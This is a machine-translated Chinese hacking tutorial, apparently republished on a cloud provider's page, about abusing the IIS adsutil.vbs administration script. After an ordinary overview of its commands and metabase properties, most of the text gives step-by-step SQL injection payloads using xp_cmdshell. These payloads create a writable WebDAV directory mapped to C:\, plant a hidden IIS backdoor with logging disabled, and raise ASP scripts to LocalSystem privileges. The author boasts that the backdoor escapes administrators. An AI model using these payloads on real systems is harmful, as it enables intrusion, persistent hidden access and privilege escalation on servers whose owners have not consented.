adsutil.vbs in scripting attacks [I am not my original]_vbs

Source: Internet
Author: User
Tags comments iis administration mssql metabase
First, a brief introduction
What is adsutil.vbs? I believe that the network administrator who used IIS will not be unaware. This is a script that IIS brings with you to administer IIS under the command line. Located in the%systemdrive%\inetpub\adminscripts directory. A full 95,426 byte size. A script of this size can be seen to be powerful. That is true. Basically I feel it's just a command line under Internet Information Services Manager. (In fact, there are more than 20 VBS files%SYSTEMDRIVE%\INETPUB\ADMINSCRIPTS on 2000 servers for administration.) And by 2003 there was only one adsutil.vbs left. Enough to show how complex its functions are.
Referring to Adsutil.vbs, we have to mention Metabase.bin. This file is the most important configuration file for IIS. All settings for IIS will eventually be stored in this file. IIS Manager and Adsutil.vbs are displayed to the user by reading the configuration information to this file. The storage structure of Metabase.bin is much like the registry, and it is a tree-type storage structure. IIS Manager and Adsutil.vbs access the Metabase.bin through a ADsPath path. The path is started by iis:\, where localhost represents the local server, while the W3SVC represents the IIS service. such as IIS:\LOCALHOST/W3SVC/1 represents the first web site on the local server. Iis:\localhost/w3svc/1/root/vdir represents the VDir virtual directory under the root directory of the first Web site.
With these knowledge, let's go back to Adsutil.vbs to see how it's used:

C:\inetpub\adminscripts>cscript adsutil.vbs//Don't forget to type cscript.exe this script host filename OH
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.


Usage:
ADSUTIL. VBS <cmd> [<path> [<value>]]

Description:
IIS Administration utility that enables the configuration of metabase properties
.

Supported Commands://Support command. This is the most important
Get, SET, ENUM, DELETE, CREATE, COPY,
Appcreateinproc, Appcreateoutproc, Appcreatepoolproc, AppDelete, AppUnload, AP
Pgetstatus

Samples://Simple few examples
adsutil.vbs get w3svc/1/serverbindings//View the bonding port for the first virtual Web site. The W3SVC/1 here is iis:\. LOCALHOSTW3SVC/1 's shorthand, and ServerBindings is his property. Same
adsutil.vbs set w3svc/1/serverbindings ": 81:"//Set the first virtual Web site's bonding port is 81.
Adsutil.vbs create W3svc/1/root/myvdir "IIsWebVirtualDir"///Create a MyVdir virtual directory under the root directory of the first virtual Web site. The following "IIsWebVirtualDir" refers to the directory type.
Adsutil.vbs start_server W3SVC/1/start the first virtual Web site.
adsutil.vbs enum/p w3svc//View all sites for IIS.

For Extended help type:
Adsutil.vbs help//If you want to see further assistance, type this command. I'm not going to turn around here. To prevent people from saying that I earn royalties. We can see for ourselves.

Above "//" After the text is I added to the Comments (hereinafter). Believe that this should be able to understand the bar everyone.
There are a few of the Adsutil.vbs commands we use: Get, SET, ENUM, DELETE, CREATE. Now let me one by one note:
The get command is usually used to view the values of each property of the directory. Set is used to set the directory properties. An enum is also used to view properties. The difference is that he directly shows all the attributes that are set up directly. Usually a directory has several pages to look at ... He has an optional "/p" switch character. Plus this switch. He will only list all the virtual directories in this directory. The delete command is used to delete a virtual directory. Create is the creation of a virtual directory. There are several other commands: Start_server, Stop_server, Pause_server, CONTINUE _server. Start, stop, pause, and continue running the virtual site, respectively.
The approximate attribute values for a virtual directory are as follows (I only list what we might use, otherwise it will be too long):

KeyType: (String) "IIsWebVirtualDir"//directory type, (string) indicating that it is a property of a string type
AppRoot: (STRING) "/lm/w3svc/1/root"//Directory IIS Path
AppFriendlyName: (STRING) "Default Application"//Application Name
AppIsolated: (INTEGER) 2//Specifies the numeric type attribute that runs in out-of-process or in process.
HttpCustomHeaders: (LIST) (1 Items)//Custom IIS Header
"Powered By:www.WoFeiWo.Info"

HttpErrors: (LIST)//pages returned by various IIS codes. You can set it yourself. I will omit it here.
DefaultDoc: (STRING) "Default.htm,index.htm,default.asp,in
Dex.asp,default.php,index.php,default.aspx,index.aspx//Directory's default home page name.
Path: (STRING) "D:\ftp"//The physical path to which the directory is actually mapped
AccessFlags: (INTEGER) 513//I don't know what it is. It hasn't been set up anyway. It seems to be set automatically.
AccessExecute: (Boolean) False//Directory Execution permission, Boolean value
Accesssource: (BOOLEAN) False//The WebDAV access of the directory is allowed
AccessRead: (BOOLEAN) True//read-only permission for directory
AccessWrite: (BOOLEAN) False//write permission for directory
AccessScript: (BOOLEAN) True//directory is allowed to execute scripts
Accessnoremoteexecute: (BOOLEAN) False
Accessnoremoteread: (BOOLEAN) False
AccessNoRemoteWrite: (BOOLEAN) False
AccessNoRemoteScript: (BOOLEAN) False
Accessnophysicaldir: (BOOLEAN) False
ScriptMaps: (LIST)//Application extension mapping
". Asa,c:\windows\system32\inetsrv\asp.dll,5,get,head,post,trace"
". Asp,c:\windows\system32\inetsrv\asp.dll,5,get,head,post,trace"
". Aspx,c:\windows\microsoft.net\framework\v1.1.4322\aspnet_isapi.dll,1,get,hea
D,post,debug "
...//This omits the N-ary data in the area./
AspEnableParentPaths: (BOOLEAN) True
AppPoolId: (STRING) "DefaultAppPool"/Application pool name
DontLog: (BOOLEAN) True//No IISLog record
DirBrowseFlags: (INTEGER)-1073741762
EnableDirBrowsing: (BOOLEAN) True//Whether the directory allows the column directory
DirBrowseShowDate: (BOOLEAN) True//Here and below are the parameter settings when the table of contents is displayed. English is very simple. I will not say more.
Dirbrowseshowtime: (BOOLEAN) True
Dirbrowseshowsize: (BOOLEAN) True
Dirbrowseshowextension: (BOOLEAN) True
Dirbrowseshowlongdate: (BOOLEAN) True
EnableDefaultDoc: (BOOLEAN) True//whether to open the default home page document

The above is what I have observed on my own machine using the cscript adsutil.vbs ENUM w3svc/1/root command. You can also enter the above command for your own research.
The above attributes can all be set by using the SET command. The following ways:
cscript adsutil.vbs set w3svc/1/root/directory name/attribute name setting value
such as: cscript adsutil.vbs set w3svc/1/root/wofeiwo/accessread 1//Set readable permissions for Wofeiwo virtual directory under the first virtual Web site to Ture
Or: cscript adsutil.vbs set W3svc/1/root/wofeiwo/path "C:\"//Set Directory mapping path is "C:\"
Now let's take a look at our simple examples
Second, the use of Adsutil.vbs
(i) The new way of uploading the MSSQL injection
Perhaps you will encounter this in MSSQL injection: SA permissions. You can execute the cmd command (xp_cmdshell, sp_OACreate, job, and so on). But the server is in the intranet. Outside is a fortress mainframe. Just made a 80-port mapping. 3389 Open No Use (intranet not even on AH), all the reverse Trojan also can not pass up (Tftp, FTP, Wget, Exe2bat, etc.) what should you do then?
AMANL eldest brother classic "Squeeze dry mssql last drop of blood" gives us a very good idea: is to use%systemdrive%\inetpub\adminscripts under the VBS to create a new virtual directory. Customize the absolute path of its mappings. This bypasses the guessing of the absolute path to the web. You can then use Backup or Maskwebtask to back up a database or temporary table to a virtual directory (or direct echo) to get a shell.
The idea above is really good. But people who have used smelly begging getwebshell or small bamboo nbupfile know how low the success rate of backup or maskwebtask is. and Echo ... I don't want to talk about it either. A line of writing that is simply a crime to find. (and keep turning special characters ...) )
In fact, we can improve the idea of amanl Big Brother. When we build a new virtual directory. You can add permissions to the Write directory. Plus WebDAV ... So will we be able to upload any files directly via IIS soon? is not limited to text files. If we upload a reverse back door to execute via sa ... Oh, everything is done!
Come on, put it on now:
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs CREATE W3svc/1/root/wofeiwo ' IIsWebVirtualDir "';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs Cscript adsutil.vbs SET W3svc/1/root/wofeiwo /path "C:\" ';--
Note that the special characters above must be changed by themselves. Or you can use the NBSI2 or the sqlcomm of the path to execute the above order.
So we built a Wofeiwo virtual directory under the first Web site, mapped to the C: root directory. I'll give him permission to read and write, and in order to get a webshell, I'll add the permissions to execute the script:
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/accessread 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/accesswrite 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/accessscript 1 ';--
A friend who has read the Surperhei "Use of Write permissions to IIS" may want to construct an HTTP package to upload files. There are more simple ways to do this:
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/enabledirbrowsing 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/accesssource 1 ';--
Set to allow the column directory and WebDAV access, and then open your Ie,ctrl+o Open the Open dialog box and type the virtual directory you just set up. Select Open as Web Folder to determine. As shown in figure:
Figure I


Ah ha! Have you seen all the folders? As shown in the figure:

Figure II


Now you can manipulate the files as you would a normal folder. You can also CTRL + C, CTRL + V copy files. It realizes the function of uploading and modifying files conveniently.
(b) further
In fact, we can further use the above mentioned ideas directly to create an IIS backdoor. Come on, look at my realization! (The method used here is described in the near-perfect IIS backdoor.) However, I was directly using Adsutil.vbs to complete the setup of this MS-band tool. Friends who are interested in this article can find out for themselves. )
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs CREATE W3svc/1/root/wofeiwo ' IIsWebVirtualDir "';--///first set up a Wofeiwo directory.
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs CREATE w3svc/1/root/wofeiwo/door ' IIsWebVirtualDir "';--///A door directory has been set up in the Wofeiwo directory.
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs Cscript adsutil.vbs SET W3svc/1/root/wofeiwo /door/path "C:\" ';--//Set door directory map to C: root directory.
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/accessread 1 ' ---///here and below are the permissions set for the table of contents. You can refer to the above command comments.
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/accesswrite 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/accessscript 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/dontlog 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/ EnableDirBrowsing 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/accesssource 1 ';--
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/ AccessExecute 1 ';--
Someone might say, "What?" Isn't that the same as the top? Oh. Actually you look carefully. You'll find us. The first newly created directory "Wofeiwo" does not set the "Path" attribute. That means he doesn't map to any actual directories. A vulnerability in IIS (involving IIS5.0.1.0) is applied here. That is, a virtual directory without the "Path" attribute will not appear in IIS Manager. Equivalent to a hidden directory. And under the virtual directory "door" is also due to the superior directory is not visible, so it is also not seen! However, the "door" directory is set with the "Path" attribute. So if we submit the http://IP/wofeiwo/door/path. The result is a file directory that will return the C:. Now this directory is already we can write any file read files. You can also go to the System32 directory to run the program. The prototype of our back door was built. (Note that I am here with the AccessExecute execution privileges)
However, the program we are now executing is still the guest privilege of the IIS default IUSR user. We're always unhappy with no big permissions. Below to enhance our permissions, add IUSR users as the administrator will not say. Here's another two ways to do that:
1, set the appisolated, so that the directory program in the process of IIS. This inherits the system permissions of IIS.
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/1/root/wofeiwo/door/appisolated 0 ';--
2, the Asp.dll of parsing ASP files is added to the privileged DLL of IIS. Make it run in the process. LocalSystem permissions to IIS.
1 first get all of the privileged DLLs of IIS
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs get W3svc/inprocessisapiapps ';--
Return:
InProcessIsapiApps: (LIST) (5 Items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
2 The Asp.dll set to the InProcessIsapiApps group, here to note that the above all the DLLs are added, otherwise it will be deleted.
Exec Master.. xp_cmdshell ' Cscript.exe%systemdrive%\inetpub\adminscripts\ adsutil.vbs SET w3svc/inprocessisapiapps ' C:\WINDOWS\ System32\inetsrv\httpext.dll "" C:\WINDOWS\system32\inetsrv\httpodbc.dll "" C:\WINDOWS\system32\inetsrv\ssinc.dll " "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\ System32\inetsrv\asp.dll "';--
Return:
InProcessIsapiApps: (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.d ll "" C:\WINDOWS\system32\inetsrv\ssinc.dll "" C:\WINDOWS\system32\msw3prt.dll "" C:\WINDOWS\Microsoft.NET\Framework \v1.1.4322\aspnet_isapi.dll "" C:\WINDOWS\system32\inetsrv\asp.dll "
That's all set up. In the future, no matter what ASP files are Loaclsystem permissions. Pass the steps above. Our IIS backdoor is basically set up. You can upload ASP trojan to help control. Such a set-back door is difficult to be found by the administrator. And completely through IIS's 80 port communication. and no logging. So it's quite safe.
Iii. statement
Here, my simple application of adsutil.vbs is over. Suddenly found that the article has been written so much. Wow, ah ... The article is written very tired. Because I am a rookie. Articles inevitably have omissions. Please give us a lot of advice. If you have any questions, please contact me. My e-mail: wofeiwo@bugkidz.org. Or we can go to the Firefox Technology Alliance http://www.wrsky.com to find me. My ID: I'm not me. is the Forum Novice Edition moderator.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.